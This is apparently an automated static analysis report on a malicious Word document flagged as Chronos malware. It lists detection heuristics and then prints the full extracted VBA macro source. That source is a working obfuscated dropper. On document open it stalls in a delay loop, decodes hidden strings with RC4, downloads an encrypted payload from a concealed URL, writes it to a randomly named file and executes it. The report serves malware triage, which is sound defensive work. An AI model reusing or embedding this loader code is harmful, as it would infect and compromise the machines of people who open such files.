Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8b1d622516ad8864…

MALICIOUS

Office (OOXML)

35.3 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-05
MD5: de7e65fd3cb1fca70602bef6481e90d0 SHA-1: 63ffdbbddbb759241fbf0c68c5270d14f3e9dbb8 SHA-256: 8b1d622516ad886428a9028813e17326260dcaa6e0f3335e0736c329dd09b321
360 Risk Score

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName BFCtsag9BmyU, 94, VbMethod, 11, 35, 89
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    D5sD2YzXccXtd = Environ(GD2JWBthipooPdm(VCOaufui5IgdsYD("BA88796A119815"), "CiPh2O5u7")) & "\" & TQVKxDfZAwhZj & GD2JWBthipooPdm(VCOaufui5IgdsYD("C7801245"), "DzzeAa")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15676 bytes
SHA-256: 15c4f71b30d62dca6888f9c85f4f1fd4dfc64fac75895af94812a6ac9c3ca9b2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
115 of 210 identifiers look randomly generated (e.g. 'E0F30B1421CBB403BD'); 5 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Tk5QWKK1zqx5l8k1L Lib "kernel32" Alias "_lwrite" (ByVal GhpAUCt4 As Long, TeElHWv2eFUM83B6 As Any, ByVal H5GnSRl4GJPp As Long) As Long
Private Declare PtrSafe Function Gngoj0INWe1IDVyD Lib "kernel32" Alias "_lcreat" (ByVal Umw7mc2tX6 As String, ByVal O7mMY9yhc As Long) As Long
Private Declare PtrSafe Function WA9cuAQKiNt Lib "kernel32" Alias "_lclose" (ByVal KJHXC5HqjR9PuylR As Long) As Long
#Else
Private Declare Function WA9cuAQKiNt Lib "kernel32" Alias "_lclose" (ByVal KJHXC5HqjR9PuylR As Long) As Long
Private Declare Function Tk5QWKK1zqx5l8k1L Lib "kernel32" Alias "_lwrite" (ByVal GhpAUCt4 As Long, TeElHWv2eFUM83B6 As Any, ByVal H5GnSRl4GJPp As Long) As Long
Private Declare Function Gngoj0INWe1IDVyD Lib "kernel32" Alias "_lcreat" (ByVal Umw7mc2tX6 As String, ByVal O7mMY9yhc As Long) As Long
#End If
Sub Document_Open()
Dim NaTECIcDv8gx As Long, PWE7M52ya As Long
NaTECIcDv8gx = 52
PWE7M52ya = 89
If NaTECIcDv8gx + PWE7M52ya > 2 Then
PWE7M52ya = NaTECIcDv8gx + 50
Else
PWE7M52ya = 95 + 30 + 80
End If
On Error Resume Next
Dim JCOsbPWmrzfykB As Long, WecLicuBJpeiK1U As Long
JCOsbPWmrzfykB = 89
WecLicuBJpeiK1U = 77
If JCOsbPWmrzfykB + WecLicuBJpeiK1U > 2 Then
WecLicuBJpeiK1U = JCOsbPWmrzfykB + 13
Else
WecLicuBJpeiK1U = 7 + 51 + 92
End If
Dim RQjSntQdTU0B8nT As Long, BD8Iq4sOQPL As Long, OXSxWXLoz6Z As Long
Dim QuglLXu0 As Long, GN0DlGBLcvScUd9Gc As Long
QuglLXu0 = 44
GN0DlGBLcvScUd9Gc = 87
If QuglLXu0 + GN0DlGBLcvScUd9Gc > 2 Then
GN0DlGBLcvScUd9Gc = QuglLXu0 + 56
Else
GN0DlGBLcvScUd9Gc = 76 + 88 + 80
End If
RQjSntQdTU0B8nT = 958711258: BD8Iq4sOQPL = 0: OXSxWXLoz6Z = 0
Dim RZWYrzOp As Long, Auour7TlthCbdzx As Long
RZWYrzOp = 69
Auour7TlthCbdzx = 38
If RZWYrzOp + Auour7TlthCbdzx > 2 Then
Auour7TlthCbdzx = RZWYrzOp + 4
Else
Auour7TlthCbdzx = 8 + 47 + 3
End If
For BD8Iq4sOQPL = 1 To RQjSntQdTU0B8nT
OXSxWXLoz6Z = OXSxWXLoz6Z + 1
Next BD8Iq4sOQPL
Dim Ns3CvqReV6 As Long, GvYboW9jVBA As Long
Ns3CvqReV6 = 94
GvYboW9jVBA = 34
If Ns3CvqReV6 + GvYboW9jVBA > 2 Then
GvYboW9jVBA = Ns3CvqReV6 + 70
Else
GvYboW9jVBA = 59 + 39 + 1
End If
If OXSxWXLoz6Z = RQjSntQdTU0B8nT Then
Dim IvsirXcthqT As Long, HhdpSSUCkaZ3dU As Long
IvsirXcthqT = 3
HhdpSSUCkaZ3dU = 63
If IvsirXcthqT + HhdpSSUCkaZ3dU > 2 Then
HhdpSSUCkaZ3dU = IvsirXcthqT + 11
Else
HhdpSSUCkaZ3dU = 12 + 9 + 18
End If
Dim HRZQpk As Long, RbaCas6pQjvGiUSa As Long
HRZQpk = 60
RbaCas6pQjvGiUSa = 64
If HRZQpk + RbaCas6pQjvGiUSa > 2 Then
RbaCas6pQjvGiUSa = HRZQpk + 4
Else
RbaCas6pQjvGiUSa = 59 + 67 + 94
End If
D9tB1rwjkp0d2rRx
Dim FrPTNtKku6V As Long, MbgBtxN As Long
FrPTNtKku6V = 48
MbgBtxN = 98
If FrPTNtKku6V + MbgBtxN > 2 Then
MbgBtxN = FrPTNtKku6V + 29
Else
MbgBtxN = 10 + 15 + 98
End If
Else
Dim PTFr6L8 As Long, IGdyVRRdWlmw As Long
PTFr6L8 = 60
IGdyVRRdWlmw = 88
If PTFr6L8 + IGdyVRRdWlmw > 2 Then
IGdyVRRdWlmw = PTFr6L8 + 30
Else
IGdyVRRdWlmw = 7 + 25 + 70
End If
CnIEIvWO9
Dim SWZEbM9D As Long, Xcb As Long
SWZEbM9D = 32
Xcb = 75
If SWZEbM9D + Xcb > 2 Then
Xcb = SWZEbM9D + 44
Else
Xcb = 64 + 76 + 68
End If
End If
Dim Vqlkk6 As Long, KjvGiUSaMh As Long
Vqlkk6 = 30
KjvGiUSaMh = 81
If Vqlkk6 + KjvGiUSaMh > 2 Then
KjvGiUSaMh = Vqlkk6 + 25
Else
KjvGiUSaMh = 23 + 76 + 41
End If
End Sub
Sub D9tB1rwjkp0d2rRx()
Dim Ert2LK As Long, D7rit As Long
Ert2LK = 63
D7rit = 33
If Ert2LK + D7rit > 2 Then
D7rit = Ert2LK + 97
Else
D7rit = 3 + 42 + 96
End If
Dim D5sD2YzXccXtd As String, GT6i9tdOslXbCF3Y As Object
Dim NEWB As Long, Ac2NUlaxI5eo As Long
NEWB = 48
Ac2NUlaxI5eo = 49
If NEWB + Ac2NUlaxI5eo > 2 Then
Ac2NUlaxI5eo = NEWB + 46
Else
Ac2NUlaxI5eo = 56 + 27 + 14
End If
D5sD2YzXccXtd = Environ(GD2JWBthipooPdm(VCOaufui5IgdsYD("BA88796A119815"), "CiPh2O5u7")) & "\" & TQVKxDfZAwhZj & GD2JWBthipooPdm(VCOaufui5IgdsYD("C7801245"), "DzzeAa")
Dim BoQnRzrjQp As Long, YgxamZzV4lNx As Long
BoQnRzrjQp = 43
YgxamZzV4lNx = 93
If BoQnRzrjQp + YgxamZzV4lNx > 2 Then
YgxamZzV4lNx = BoQnRzrjQp + 15
Else
YgxamZzV4lNx = 4 + 39 + 7
End If
Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
Dim LL6L02KKEUXpq As Long, BuISgnG3kV As Long
LL6L02KKEUXpq = 55
BuISgnG3kV = 30
If LL6L02KKEUXpq + BuISgnG3kV > 2 Then
BuISgnG3kV = LL6L02KKEUXpq + 4
Else
BuISgnG3kV = 56 + 24 + 51
End If
GT6i9tdOslXbCF3Y.Open GD2JWBthipooPdm(VCOaufui5IgdsYD("7D8E15"), "UmuELG2see"), GD2JWBthipooPdm(VCOaufui5IgdsYD("356FF1222751477B340D742A954ADCAE29A4871541A2031DC5F794"), "Ak1dNyiB7"), False
Dim GbwcnkIgvf As Long, QLKP As Long
GbwcnkIgvf = 49
QLKP = 74
If GbwcnkIgvf + QLKP > 2 Then
QLKP = GbwcnkIgvf + 72
Else
QLKP = 4 + 11 + 16
End If
GT6i9tdOslXbCF3Y.setRequestHeader GD2JWBthipooPdm(VCOaufui5IgdsYD("1CEE157DE0F83E4E1BF0"), "I7lT6o3QB"), GD2JWBthipooPdm(VCOaufui5IgdsYD("ACA07173589D880D091240"), "GhnHI")
GT6i9tdOslXbCF3Y.send
If GT6i9tdOslXbCF3Y.readyState = 4 And GT6i9tdOslXbCF3Y.Status = 200 Then
Dim P3kVdSBtm2ja As Long, B2seepHU As Long
P3kVdSBtm2ja = 35
B2seepHU = 63
If P3kVdSBtm2ja + B2seepHU > 2 Then
B2seepHU = P3kVdSBtm2ja + 5
Else
B2seepHU = 8 + 26 + 45
End If
YkJZN0Q72EzA D5sD2YzXccXtd, GD2JWBthipooPdm(StrConv(GT6i9tdOslXbCF3Y.ResponseBody, vbUnicode), GD2JWBthipooPdm(VCOaufui5IgdsYD("E0F30B1421CBB403BD"), "XsOJ9WSFHTfioE"))
Dim FQDIJzVO As Long, OfJs9R As Long
FQDIJzVO = 21
OfJs9R = 33
If FQDIJzVO + OfJs9R > 2 Then
OfJs9R = FQDIJzVO + 70
Else
OfJs9R = 85 + 65 + 26
End If
LPeLdfiOGaom 1
Dim Yq9KATP7JzYlQlC As Long, RuAJ9zlGG4ODkoc As Long
Yq9KATP7JzYlQlC = 27
RuAJ9zlGG4ODkoc = 41
If Yq9KATP7JzYlQlC + RuAJ9zlGG4ODkoc > 2 Then
RuAJ9zlGG4ODkoc = Yq9KATP7JzYlQlC + 44
Else
RuAJ9zlGG4ODkoc = 62 + 8 + 97
End If
CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("64B9578892015043C9AF62162D"), "BolfCtqA1cKp")).exec """" & D5sD2YzXccXtd & """"
Dim XQhr3MSlD As Long, G7F2ZpnLLa As Long
XQhr3MSlD = 84
G7F2ZpnLLa = 93
If XQhr3MSlD + G7F2ZpnLLa > 2 Then
G7F2ZpnLLa = XQhr3MSlD + 65
Else
G7F2ZpnLLa = 51 + 65 + 24
End If
End If
Dim KTy85XBgD1gsT66o As Long, M385YC8rJVxOy As Long
KTy85XBgD1gsT66o = 45
M385YC8rJVxOy = 57
If KTy85XBgD1gsT66o + M385YC8rJVxOy > 2 Then
M385YC8rJVxOy = KTy85XBgD1gsT66o + 49
Else
M385YC8rJVxOy = 72 + 5 + 33
End If
Set GT6i9tdOslXbCF3Y = Nothing
Dim SMSlDUoo As Long, KZpnLLa0XhLhfx As Long
SMSlDUoo = 69
KZpnLLa0XhLhfx = 11
If SMSlDUoo + KZpnLLa0XhLhfx > 2 Then
KZpnLLa0XhLhfx = SMSlDUoo + 14
Else
KZpnLLa0XhLhfx = 32 + 51 + 41
End If
End Sub
Sub LPeLdfiOGaom(HnCFz2Jiz As Long)
Dim W87tKzf As Long, KjhQZfQsbAVJtuU3r As Long
W87tKzf = 5
KjhQZfQsbAVJtuU3r = 61
If W87tKzf + KjhQZfQsbAVJtuU3r > 2 Then
KjhQZfQsbAVJtuU3r = W87tKzf + 64
Else
KjhQZfQsbAVJtuU3r = 27 + 39 + 76
End If
Dim Yo0l As Long
Dim ACMz9PVtQekZQm As Long, FjnPse2j As Long
ACMz9PVtQekZQm = 77
FjnPse2j = 13
If ACMz9PVtQekZQm + FjnPse2j > 2 Then
FjnPse2j = ACMz9PVtQekZQm + 8
Else
FjnPse2j = 51 + 93 + 40
End If
Yo0l = Timer + HnCFz2Jiz
Do While Timer < Yo0l
DoEvents
Loop
Dim ScC3hL2mIolMN As Long, Oi91ON As Long
ScC3hL2mIolMN = 26
Oi91ON = 15
If ScC3hL2mIolMN + Oi91ON > 2 Then
Oi91ON = ScC3hL2mIolMN + 50
Else
Oi91ON = 44 + 87 + 56
End If
End Sub
Function VCOaufui5IgdsYD(LDGRNsY7g9Q3SG2 As String) As String
Dim A0dgfZCMz9 As Long, HJy385Y As Long
A0dgfZCMz9 = 59
HJy385Y = 67
If A0dgfZCMz9 + HJy385Y > 2 Then
HJy385Y = A0dgfZCMz9 + 18
Else
HJy385Y = 68 + 89 + 77
End If
Dim HrXL87kb As Integer
Dim ItnBdglWBM As Long, DsOipZ5TwQEC As Long
ItnBdglWBM = 82
DsOipZ5TwQEC = 72
If ItnBdglWBM + DsOipZ5TwQEC > 2 Then
DsOipZ5TwQEC = ItnBdglWBM + 29
Else
DsOipZ5TwQEC = 33 + 95 + 34
End If
For HrXL87kb = 1 To Len(LDGRNsY7g9Q3SG2) Step 2
VCOaufui5IgdsYD = VCOaufui5IgdsYD & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(LDGRNsY7g9Q3SG2, HrXL87kb, 2)))
Next
Dim Ev0H2eoVH6 As Long, OvoJTND0xZxdq As Long
Ev0H2eoVH6 = 13
OvoJTND0xZxdq = 33
If Ev0H2eoVH6 + OvoJTND0xZxdq > 2 Then
OvoJTND0xZxdq = Ev0H2eoVH6 + 73
Else
OvoJTND0xZxdq = 98 + 74 + 48
End If
End Function
Function GD2JWBthipooPdm(ByVal Qb5elCmoyG As String, ByVal OlroKXMXHgE As String) As String
Dim AKEmEhS As Long, BmgOCSMUfqtAYTM2T As Long
AKEmEhS = 28
BmgOCSMUfqtAYTM2T = 34
If AKEmEhS + BmgOCSMUfqtAYTM2T > 2 Then
BmgOCSMUfqtAYTM2T = AKEmEhS + 18
Else
BmgOCSMUfqtAYTM2T = 65 + 22 + 80
End If
On Error Resume Next
Dim IBsjdSTadV As Long, AxdqtIkN As Long
IBsjdSTadV = 80
AxdqtIkN = 29
If IBsjdSTadV + AxdqtIkN > 2 Then
AxdqtIkN = IBsjdSTadV + 58
Else
AxdqtIkN = 44 + 14 + 78
End If
Dim M9Bm84vB9VPFBlmfW(0 To 255) As Integer, RuCCbLggZ1h As Long, MB1TOMuiZrQ As Long, VWeZXqXwz As Long, RzE() As Byte, Owuj3YFjx2() As Byte, YwiNcdLBCC As Byte
Dim QJFxRcpyZDNlRZ As Long, MpBn4FKgpjwexU As Long
QJFxRcpyZDNlRZ = 22
MpBn4FKgpjwexU = 80
If QJFxRcpyZDNlRZ + MpBn4FKgpjwexU > 2 Then
MpBn4FKgpjwexU = QJFxRcpyZDNlRZ + 76
Else
MpBn4FKgpjwexU = 42 + 20 + 59
End If
RzE() = StrConv(OlroKXMXHgE, vbFromUnicode)
Dim HtIkNDG9g0vQ As Long, PgviHdO20Md As Long
HtIkNDG9g0vQ = 49
PgviHdO20Md = 25
If HtIkNDG9g0vQ + PgviHdO20Md > 2 Then
PgviHdO20Md = HtIkNDG9g0vQ + 43
Else
PgviHdO20Md = 88 + 78 + 35
End If
For RuCCbLggZ1h = 0 To 255
M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) = RuCCbLggZ1h
Next RuCCbLggZ1h
RuCCbLggZ1h = 0
MB1TOMuiZrQ = 0
VWeZXqXwz = 0
For RuCCbLggZ1h = 0 To 255
MB1TOMuiZrQ = (MB1TOMuiZrQ + M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) + RzE(RuCCbLggZ1h Mod Len(OlroKXMXHgE))) Mod 256
YwiNcdLBCC = M9Bm84vB9VPFBlmfW(RuCCbLggZ1h)
M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) = M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)
M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) = YwiNcdLBCC
Next RuCCbLggZ1h
RuCCbLggZ1h = 0
MB1TOMuiZrQ = 0
VWeZXqXwz = 0
Owuj3YFjx2() = StrConv(Qb5elCmoyG, vbFromUnicode)
For RuCCbLggZ1h = 0 To Len(Qb5elCmoyG)
MB1TOMuiZrQ = (MB1TOMuiZrQ + 1) Mod 256
VWeZXqXwz = (VWeZXqXwz + M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)) Mod 256
YwiNcdLBCC = M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)
M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) = M9Bm84vB9VPFBlmfW(VWeZXqXwz)
M9Bm84vB9VPFBlmfW(VWeZXqXwz) = YwiNcdLBCC
Owuj3YFjx2(RuCCbLggZ1h) = Owuj3YFjx2(RuCCbLggZ1h) Xor (M9Bm84vB9VPFBlmfW((M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) + M9Bm84vB9VPFBlmfW(VWeZXqXwz)) Mod 256))
Next RuCCbLggZ1h
Dim NBlknCxetRb0ZEC As Long, BQ5RTYRV As Long
NBlknCxetRb0ZEC = 62
BQ5RTYRV = 83
If NBlknCxetRb0ZEC + BQ5RTYRV > 2 Then
BQ5RTYRV = NBlknCxetRb0ZEC + 94
Else
BQ5RTYRV = 87 + 10 + 42
End If
GD2JWBthipooPdm = StrConv(Owuj3YFjx2, vbUnicode)
Dim YSTr3QgBZIN6yPLWz As Long, JliYPMsLNdk As Long
YSTr3QgBZIN6yPLWz = 33
JliYPMsLNdk = 21
If YSTr3QgBZIN6yPLWz + JliYPMsLNdk > 2 Then
JliYPMsLNdk = YSTr3QgBZIN6yPLWz + 56
Else
JliYPMsLNdk = 50 + 94 + 62
End If
End Function
Function TQVKxDfZAwhZj() As String
Dim KnlARNhz33 As Long, GLP As Long
KnlARNhz33 = 73
GLP = 4
If KnlARNhz33 + GLP > 2 Then
GLP = KnlARNhz33 + 84
Else
GLP = 89 + 73 + 22
End If
Dim It3uEqi1Jz2Z4i1M() As Byte, NwYJ7efQeh7S() As Byte, GfUud As Long, Ukb2O As Long, A00fGP36W As String, XsPCbWU8joa78e As String, Ny9vmRx As Long
Dim NyqlIzVtn5L8 As Long, YB5zOVccUOZ As Long
NyqlIzVtn5L8 = 49
YB5zOVccUOZ = 50
If NyqlIzVtn5L8 + YB5zOVccUOZ > 2 Then
YB5zOVccUOZ = NyqlIzVtn5L8 + 47
Else
YB5zOVccUOZ = 56 + 27 + 14
End If
Ny9vmRx = 0
Dim WI3IR0BC9M79pK As Long, RkHss7 As Long
WI3IR0BC9M79pK = 54
RkHss7 = 34
If WI3IR0BC9M79pK + RkHss7 > 2 Then
RkHss7 = WI3IR0BC9M79pK + 94
Else
RkHss7 = 85 + 86 + 83
End If
ChRa37WMyC14ZV:
Dim WzMRHC2p2PA As Long, GBJmj0IlFMwt6joX As Long
WzMRHC2p2PA = 63
GBJmj0IlFMwt6joX = 5
If WzMRHC2p2PA + GBJmj0IlFMwt6joX > 2 Then
GBJmj0IlFMwt6joX = WzMRHC2p2PA + 81
Else
GBJmj0IlFMwt6joX = 45 + 35 + 91
End If
Randomize
XsPCbWU8joa78e = Int(30 * Rnd)
If XsPCbWU8joa78e < 4 Then GoTo ChRa37WMyC14ZV
Ny9vmRx = XsPCbWU8joa78e
If Ny9vmRx > 0& Then
Dim EV7kYkEr As Long, F3bimM As Long
EV7kYkEr = 33
F3bimM = 45
If EV7kYkEr + F3bimM > 2 Then
F3bimM = EV7kYkEr + 59
Else
F3bimM = 18 + 43 + 41
End If
A00fGP36W = GD2JWBthipooPdm(VCOaufui5IgdsYD("49141AE6EFD9109E11A1"), "WimM25s8BRY2")
Randomize
It3uEqi1Jz2Z4i1M = A00fGP36W
GfUud = Len(A00fGP36W) - 1&
Ny9vmRx = (Ny9vmRx * 2&) - 1&
ReDim NwYJ7efQeh7S(Ny9vmRx) As Byte
Dim RdBDn As Long, BuHXJD43ja As Long
RdBDn = 17
BuHXJD43ja = 46
If RdBDn + BuHXJD43ja > 2 Then
BuHXJD43ja = RdBDn + 32
Else
BuHXJD43ja = 1 + 66 + 70
End If
For Ukb2O = 0& To Ny9vmRx Step 2&
NwYJ7efQeh7S(Ukb2O) = It3uEqi1Jz2Z4i1M(CLng(GfUud * Rnd) * 2&)
Next
Dim Nn9ksyK As Long, LlXCSNZ0qbWOJ As Long
Nn9ksyK = 44
LlXCSNZ0qbWOJ = 63
If Nn9ksyK + LlXCSNZ0qbWOJ > 2 Then
LlXCSNZ0qbWOJ = Nn9ksyK + 30
Else
LlXCSNZ0qbWOJ = 30 + 5 + 78
End If
End If
Dim VU94okUoZnY As Long, QAiLfyhJ60r As Long
VU94okUoZnY = 25
QAiLfyhJ60r = 93
If VU94okUoZnY + QAiLfyhJ60r > 2 Then
QAiLfyhJ60r = VU94okUoZnY + 14
Else
QAiLfyhJ60r = 26 + 18 + 40
End If
TQVKxDfZAwhZj = NwYJ7efQeh7S
Dim VYG9e7PQw8OqGQXYp As Long, REjVMXDBB3z1 As Long
VYG9e7PQw8OqGQXYp = 34
REjVMXDBB3z1 = 20
If VYG9e7PQw8OqGQXYp + REjVMXDBB3z1 > 2 Then
REjVMXDBB3z1 = VYG9e7PQw8OqGQXYp + 34
Else
REjVMXDBB3z1 = 92 + 18 + 16
End If
End Function
Sub CnIEIvWO9()
Dim Glu As Long, KJ4ab As Long
Glu = 21
KJ4ab = 58
If Glu + KJ4ab > 2 Then
KJ4ab = Glu + 19
Else
KJ4ab = 65 + 23 + 94
End If
Atn 2
Month 64
LZ8z8KtsJEresKj = Dir("U6ULZ")
Err.Clear
Second 3
DeleteSetting "SMzku"
QklAcX37n = Fix(13)
CQayNwfXOg = UCase(29)
DateSerial 9, 69, 86
Round 87, 84
IRKfJLWPo = DateValue(94)
If CByte(39) = True Then HCZDdIlLHKiJ788 = 5265
If IsMissing(24) = True Then IbTxDjxz = 49
App.LogEvent "Y4rDJuZhkE1L"
InputBox 47, 78, 85, 90, 74
Tym52iTXFp = Cos(10)
Hour 23
Ys8YXOIBvvz = CVar(52)
Sin 38
IPmt 8, 72, 77, 17
Err.Raise 71
Rate 80, 7, 1
Choose 67, ILn8E6cYUtZ0qbWOJ
If CBool(92) = True Then IRKfJLWTRm = 42
Year 42
CallByName BFCtsag9BmyU, 94, VbMethod, 11, 35, 89
Load Kl1f9
Switch 27
FV 87, 33, 67
Tan 18
Dim WMnXy9nI As Long, BJ1rKAQmEAEKR As Long
WMnXy9nI = 40
BJ1rKAQmEAEKR = 20
If WMnXy9nI + BJ1rKAQmEAEKR > 2 Then
BJ1rKAQmEAEKR = WMnXy9nI + 80
Else
BJ1rKAQmEAEKR = 97 + 98 + 95
End If
End Sub
Function YkJZN0Q72EzA(ByKatg As String, ToSgtKmFri9VtHd As String)
Dim WVW3y6iiMyi As Long, MDAD5M1zQQG As Long
WVW3y6iiMyi = 75
MDAD5M1zQQG = 64
If WVW3y6iiMyi + MDAD5M1zQQG > 2 Then
MDAD5M1zQQG = WVW3y6iiMyi + 93
Else
MDAD5M1zQQG = 37 + 79 + 27
End If
Dim LbrWvWUomyXH As Long
Dim HgMWyW2GvT As Long, DFmlUxUKqhP As Long
HgMWyW2GvT = 62
DFmlUxUKqhP = 30
If HgMWyW2GvT + DFmlUxUKqhP > 2 Then
DFmlUxUKqhP = HgMWyW2GvT + 74
Else
DFmlUxUKqhP = 43 + 63 + 74
End If
LbrWvWUomyXH = Gngoj0INWe1IDVyD(ByKatg, 128)
Dim KkpkXMjEOh As Long, GT7dOBlOugmtLqGt As Long
KkpkXMjEOh = 82
GT7dOBlOugmtLqGt = 69
If KkpkXMjEOh + GT7dOBlOugmtLqGt > 2 Then
GT7dOBlOugmtLqGt = KkpkXMjEOh + 83
Else
GT7dOBlOugmtLqGt = 42 + 66 + 65
End If
Tk5QWKK1zqx5l8k1L LbrWvWUomyXH, ByVal ToSgtKmFri9VtHd, Len(ToSgtKmFri9VtHd)
Dim YRHw8tm38Cpc As Long, GfqwsnlaSb As Long
YRHw8tm38Cpc = 55
GfqwsnlaSb = 53
If YRHw8tm38Cpc + GfqwsnlaSb > 2 Then
GfqwsnlaSb = YRHw8tm38Cpc + 7
Else
GfqwsnlaSb = 71 + 5 + 77
End If
WA9cuAQKiNt LbrWvWUomyXH
Dim KK99hfqy00QsbZ As Long, WABX9SYvhOo As Long
KK99hfqy00QsbZ = 29
WABX9SYvhOo = 29
If KK99hfqy00QsbZ + WABX9SYvhOo > 2 Then
WABX9SYvhOo = KK99hfqy00QsbZ + 81
Else
WABX9SYvhOo = 97 + 22 + 76
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 38400 bytes
SHA-256: 333cc24118a0ec015044cb6d57e0f2d7d3d29c9fba5086e40e4f098ac7d7ff0e
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely